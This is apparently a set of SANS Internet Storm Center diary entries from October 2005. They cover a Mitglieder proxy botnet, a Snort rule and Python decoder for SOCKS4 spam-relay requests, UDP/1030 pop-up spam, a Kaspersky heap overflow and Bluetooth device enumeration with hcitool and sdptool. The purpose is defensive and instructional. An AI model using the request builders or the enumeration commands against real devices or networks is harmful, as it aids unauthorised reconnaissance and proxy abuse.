Symantec AntiVirus Scan Engine for ISA                         4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for ISA                         4.3      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Netapp Filer                4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Messaging                   4.3      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Netapp NetCache             4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Network Attached Storage    4.3      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Bluecoat                    4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Caching                     4.3      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Microsoft SharePoint        4.3      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Clearswift                  4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine for Clearswift                  4.3      All    SAVSE 4.3.12

Non-Affected Product(s)

Product                                                        Version  Build
Symantec AntiVirus Scan Engine                                 4.1      All


Published: 2005-10-03

Mitglieder hell

I have very recently been (and still am) investigating the business end of a very active Mitglieder proxynet.  In my experience, these proxy botnets are traditionally used to relay spam, but over time I have witnessed other uses of proxy botnets, including but not limited to advertising click-through fraud, fraudulent email and IM account registration/creation, HTTP-based web attacks, and all manner of authentication brute force attacks.

I am currently witnessing the receiving end of a large-scale brute force attack leveraged by a decently sized proxy botnet consisting of anywhere from 8k-12k nodes attacking at any time on any given day.  I'm somewhat frustrated by the ongoing success of these botnet variants, due to this particular variant's HTTP-based phone-home method for registering the client IP and SOCKS proxy listener port.  Why oh why does it have to be so hard to kill these international web servers dead?  The specific Mitglieder variant I have been looking at lately has at least 42 unique HTTP phone-home destinations that are still DNS resolvable.  The bots phone home with the following HTTP GET patterns, which result in the target HTTP server logging the client IP address along with the SOCKS proxy port number as a query string argument.  Even though many of these servers are obviously virtual hosting environments that return 404 errors or other status codes, it is still possible that they are involved in this mess, since the HTTP server will still gladly log the pertinent client IP and port number of infected nodes via error logging.

In the following list, the tpoint.ru host is currently THE WORST of them and possibly the primary node in masterminding the aggregation and distribution of the active botnet list to other top level proxy abusers to be used for bulk mailer and other abuse types that benefit from an additional hop of anonymous connectivity.  This is absolutely organized big business.  Within minutes of sending a fake connection to tpoint.ru you would see inbound socks proxy abuse.  Try it, you'll see.  Whether you like it is another matter altogether.

Here's a snort signature that can help identify not only Mitglieder proxy infections on your networks, but just about any other proxy bot variant when they are abused for bulkmailing purposes.  Apologies for the snort signature line wrap.  Yes, the rule should be one single line.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE Spambot Proxy Control Channel"; flow: established; content:"|04010019|"; offset: 0; depth: 4; classtype: trojan-activity; sid: 2001814; rev:4; )
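What that signature is actually keying on deserves spelling out, so here is an added Python example (not from the diary and not part of Snort or Bleeding Edge). The content "|04 01 00 19|" at offset 0, depth 4 is the start of a SOCKS4 request: version 4, command 1 (CONNECT), destination port 0x0019 = 25. In other words, it fires when an outside party asks a SOCKS listener inside your network to open a connection to an SMTP server, which is exactly what a bulk mailer abusing a proxy bot does. The code decodes SOCKS4 and SOCKS4a requests properly (so it also yields the mail server the abuser is aiming at), reproduces the rule's byte test, and triages a list of constructed inbound flows; the addresses, ports and payloads are all constructed.

```python
"""Decode SOCKS4/4a CONNECT requests to TCP/25 on a proxy-bot listener, i.e. what the
Snort rule's content "|04 01 00 19|" at offset 0 matches. Added example; not from the
ISC diary and not a Snort component. All packets below are constructed."""
import struct
import ipaddress

SOCKS4_VERSION = 4
SOCKS4_CONNECT = 1
SMTP_PORT = 25


def parse_socks4_request(payload):
    """Decode VN, CD, DSTPORT, DSTIP, USERID\\0 [, HOSTNAME\\0 for SOCKS4a].
    Returns a dict, or None when the bytes are not a well-formed SOCKS4 request."""
    if len(payload) < 9:  # 8 fixed bytes plus at least the USERID terminator
        return None
    version, command, port = struct.unpack(">BBH", payload[:4])
    if version != SOCKS4_VERSION or command not in (1, 2):  # 1=CONNECT, 2=BIND
        return None
    dst_ip = ipaddress.IPv4Address(payload[4:8])
    userid, sep, rest = payload[8:].partition(b"\x00")
    if not sep:
        return None  # USERID must be NUL terminated
    hostname = None
    # SOCKS4a: DSTIP of 0.0.0.x (x != 0) means a NUL-terminated hostname follows USERID.
    if dst_ip in ipaddress.IPv4Network("0.0.0.0/24") and int(dst_ip) != 0:
        hostname, sep, _ = rest.partition(b"\x00")
        if not sep:
            return None
    return {"command": command, "port": port, "ip": str(dst_ip),
            "userid": userid.decode("latin-1"),
            "hostname": hostname.decode("latin-1") if hostname else None}


def matches_spambot_rule(payload):
    """Exactly the Snort content test: bytes 0..3 equal 04 01 00 19 (SOCKS4 CONNECT, port 25)."""
    return payload[:4] == b"\x04\x01\x00\x19"


def build_socks4_connect(ip, port, userid=b"", hostname=None):
    """Constructed request, as an abuser would send it to an infected host's SOCKS listener."""
    req = struct.pack(">BBH", SOCKS4_VERSION, SOCKS4_CONNECT, port)
    req += ipaddress.IPv4Address(ip).packed + userid + b"\x00"
    if hostname is not None:
        req += hostname + b"\x00"
    return req


def triage(flows):
    """flows: iterable of (src_ip, dst_ip, dst_port, first_payload) for inbound sessions.
    Returns the flows whose first payload asks the proxy to CONNECT to SMTP."""
    hits = []
    for src, dst, dport, payload in flows:
        req = parse_socks4_request(payload)
        if req and req["command"] == SOCKS4_CONNECT and req["port"] == SMTP_PORT:
            assert matches_spambot_rule(payload)  # the byte rule and the parser agree
            hits.append((src, dst, dport, req["hostname"] or req["ip"]))
    return hits


# Constructed flows: external addresses talking to internal hosts on odd high ports.
SAMPLE_FLOWS = [
    ("192.0.2.10", "10.0.0.5", 29185, build_socks4_connect("198.51.100.25", 25)),
    ("192.0.2.11", "10.0.0.5", 29185, build_socks4_connect("198.51.100.80", 80)),
    ("192.0.2.12", "10.0.0.9", 8080,
     build_socks4_connect("0.0.0.1", 25, b"bot", b"mx.example.net")),
    ("192.0.2.13", "10.0.0.9", 8080, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_FLOWS):
        print("SOCKS4 CONNECT to SMTP via proxy bot:", hit)
```

The rule deliberately ignores the destination host, so a single infected machine will trigger it once per SMTP target; the decoded hostname or IP is what tells you which mail servers the abusers are relaying through, and a SOCKS5 variant (version byte 0x05) needs a different signature.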

After you've completed your own personal investigations, I myself recommend blocking access to the following host names from your networks.


Give 'em hell.

William Salusky
Handler on Duty (heh heh)
Future homepage for the above handler.


Published: 2005-10-03

Arnold muscles in to put the smackdown on phishers.

California Governor Arnold Schwarzenegger flexed his muscles on Friday, September 30th, signing California bill 355 into law and making phishing offenses punishable to the tune of either actual damages or $500,000 (USD).  I'll take the latter, thank you very much.  Now the remaining problem is actually finding a phisher who stands still for their punishment.  California Bill 355 is viewable here.

I hope it's not long before Virginia has an equivalent law on the books.  If not, I'll petition for it and ask that the default maximum amount be set to 1mil(USD).  Hey, Why not?


Published: 2005-10-03

UDP/1030 (continued)

In a continuing effort since yesterday, our readers have been providing us with packet captures of UDP/1030 traffic, and these do in fact confirm that the DShield port utilization increase is attributable to Windows Messenger popup spamming attempts.  We are no longer in need of new packet captures.  I repeat, we are no longer in need of packet captures.  We have, however, been unable to confirm any case in which this traffic would result in a successful display of messenger popup spam.

All samples provided were of the 'Registry fix, You need our application' spam, and if you regularly look at traffic captures this will be nothing new.  I am almost to the point where I treat UDP/1025-1030 as universal background noise.


Published: 2005-10-03

Kaspersky Anti-Virus Products Remote Heap Overflow Vulnerability

From the advisory the "issue is due to a heap overflow error in the CAB file format parser that does not properly handle a specially crafted file containing large header records and particular header flags set, which could be exploited by attackers to execute arbitrary commands (e.g. by sending an email containing a specially crafted CAB file)."


Published: 2005-10-02

Volunteer Response

Thanks to all who have volunteered over the past few weeks to assist the Red Cross and others with technical support in the wake of hurricanes Katrina and Rita.  Over 300 people and dozens of companies signed up, and the Red Cross has told us that the outpouring of help was really appreciated.  Here are some of the comments we received from Gordon Bass, the Deputy Chief Information Security Officer of the American Red Cross:

"Tim ... is spending 1 to 2 weeks of his personal vacation time on assignment in our disaster operations warehouse in Austin, TX, performing configuration management and deployment of computer assets to shelters."

"Robert ... is spending one or more days of his personal time helping us to configure our new TippingPoint IPSs at national HQ."

"Chris ..., and project manager, Russ ..., configured and delivered 16 IBM donated Thinkpads to four chapter/disaster operations locations in Mobile, Pascagoula, Gulfport, and Hattiesburg on Friday and Saturday, Sept. 9-10.  Those laptops are being used in shelter and client assistance operations."

"A week ago I mentioned two volunteers that were helping us out.  Since then, we have engaged many more SANS volunteers.  At this point I am not sure if I can even identify them all, since I shared our list of volunteers with so many people that needed technology help in our various Gulf coast service areas.  But we know they're helping.  As well as individuals, there are companies helping us out."

Folks, it goes without saying but Thanks Very Much for all that you are doing to assist in the recovery efforts!  Please keep up the great work and the volunteer spirit!


Published: 2005-10-02

Storm Center in the News

The SANS Internet Storm Center was featured in two news stories this past week.  Kudos to Tom Liston for his assistance to CNN with their story on Internet fraud that appeared on September 29th.  Look about two-thirds of the way down for his comments.  Over on Voice of America, yours truly appeared in a series on Internet crime and what we are doing behind the scenes at the ISC to assist law enforcement.  It's a three part series; here are links to part 1, part 2, and part 3.


Published: 2005-10-02

udp/1030 Increase

We've noticed a significant increase in udp/1030 activity in the past 24 hours.  Our initial assessment is that this is a new form of pop-up spam.  If you have captured any of this and have thoughts or analysis you can contribute, please drop us a note on our contact page.  (Update:  earlier I had said "tcp" vice "udp" - I didn't pay close attention to our sensor outputs.  It should be udp.)


Published: 2005-10-01

Bluetooth Auditing

I had promised more details on how I conducted my bluetooth audit during a disaster drill (http://isc.sans.org/diary.php?date=2005-06-20) when I was handler last, but I was also working some local response to Katrina (http://isc.sans.org/diary.php?date=2005-09-05) and didn't have the spare mental cycles to provide an update.  Today has allowed me a few moments to play a bit, and fulfill my promises.

The platform
I used what I call my "combat laptop," or the "throwaway laptop."  This is the one that I carry with me when I travel and go to conferences.  It's had a lot of damage, but it still runs linuxes just fine.  This particular incarnation is running Debian and I used the BlueZ bluetooth stack/suite (http://www.bluez.org/).

The Bluetooth interface I used is a Belkin Bluetooth USB Adapter (F8T001).

Getting it up and running wasn't trivial; I found the following links to be helpful resources:
http://www.kevinboone.com/PF_p800_linux.html (specifically with its references to bluezfw.)

Actually, nothing I tried could get it to work, until I moved the bluetooth dongle to another USB port.  I'm not sure why that was required, but I'm not always the smartest little Mouseketeer.

While experimenting with other platforms, I found that knoppix includes bluetooth USB support.

The software
While googling on the topic, you will find lots of references to customized software used for the scanning (and by references you see people mention it, but nobody coughs up a link.)  Since my initial goal was simple enumeration of devices and quick assessment of how "juicy" a given target area is, I did not have need for actual bluetooth exploits.  I found that the basic tools in the BlueZ tool suite were sufficient for my needs.

Starting simply with:
    hcitool scan

This will list the hardware ID numbers and a manufacturer's name of any device advertising in range.  That "advertising" part is important.  These would be the wardriving equivalent of wide open WAPs broadcasting.

If you are looking for particular services to exploit -- er, enumerate, you can simply scan for devices that support the feature of interest.  For example, to find devices capable of setting up a dial-up internet connection, you would use:
    sdptool search DUN

Other interesting services to search for are FTRN (for file transfer,) and OPUSH.

A much more scientific way to go about this process is to use bp from the trifinite group (http://trifinite.org/) which I like because it relies on BlueZ's sdptool, and the Bluetooth Device Security Database (http://www.betaversion.net/btdsd/) all glued together with perl.  Nice and simple and hackable.

Their process interrogates a bluetooth device using sdptool browse --tree XX:XX:XX:XX:XX:XX (which might be handy to have around later anyway.)
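As an added example (not the handler's code, and not BlueZ's or trifinite's), a small Python inventory that reads the output of `sdptool browse` for several devices and reports which of them advertise the DUN, OPUSH and file-transfer profiles by their 16-bit service class UUIDs, which is the quick "how juicy is this area" assessment described above. It assumes the default (non `--tree`) record layout shown in the constructed sample; the function names are mine.

```python
import re

# Bluetooth SIG 16-bit service class UUIDs for the profiles discussed above.
RISKY_SERVICES = {
    0x1103: "DUN",    # Dial-up Networking
    0x1105: "OPUSH",  # OBEX Object Push
    0x1106: "FTP",    # OBEX File Transfer
}

UUID_RE = re.compile(r"\(0x([0-9a-fA-F]{4})\)")           # e.g. "Dialup Networking" (0x1103)
BROWSE_RE = re.compile(r"^Browsing ([0-9A-F:]{17}) \.\.\.")  # sdptool per-device header


def parse_sdptool_browse(text: str) -> dict:
    """Map each browsed device address to the set of UUIDs found in its
    records. Every UUID in parentheses is collected; protocol UUIDs such
    as L2CAP (0x0100) are harmless because only RISKY_SERVICES is reported."""
    inventory, addr = {}, None
    for line in text.splitlines():
        m = BROWSE_RE.match(line)
        if m:
            addr = m.group(1)
            inventory.setdefault(addr, set())
        elif addr is not None:
            inventory[addr].update(int(u, 16) for u in UUID_RE.findall(line))
    return inventory


def exposed_services(text: str) -> dict:
    """Reduce the inventory to the named services an auditor cares about."""
    return {addr: sorted(RISKY_SERVICES[u] for u in uuids if u in RISKY_SERVICES)
            for addr, uuids in parse_sdptool_browse(text).items()}


# Constructed sample output (two devices, addresses made up for this example).
SAMPLE_BROWSE = """\
Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up networking
Service RecHandle: 0x10000
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: OBEX Object Push
Service Class ID List:
  "OBEX Object Push" (0x1105)

Browsing 66:77:88:99:AA:BB ...
Service Name: Headset
Service Class ID List:
  "Headset" (0x1108)
"""
```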

Antenna Performance
Although the box advertised 100m ranges, a dongle plugged into the side of a laptop isn't in an ideal location for signal reception.  Use of a USB extension cable is recommended.  If you want to get really crazy, place the dongle in the focus point of a parabolic dish (I haven't tried that myself, but I've heard it works for 802.11 dongles.)  You could also hack an external antenna onto your bluetooth interface (http://trifinite.org/trifinite_stuff_bluetooone.html) I haven't tried this either.  The orderlies don't like me around soldering irons and glue-guns.

Sensor Placement
Unlike wardriving, this is more of a sit-and-wait game.  Bluetooth devices and users are mobile, so it's better to pick a proper high-traffic area (or better yet: the meeting room where you're holding your audit kick-off meeting.)  With enough sensors and proper placement, you can track the movement of your bluetooth users within your facility or campus.  I'm sure nobody would do anything bad with that information. :-\

In other related neat-stuff-to-do
Check out http://cellspotting.com for something only peripherally related.

This is my first shift with the new system (be gentle); any errors in typography, grammar, or HTML syntax are purely my own.
kliston -at- isc sans org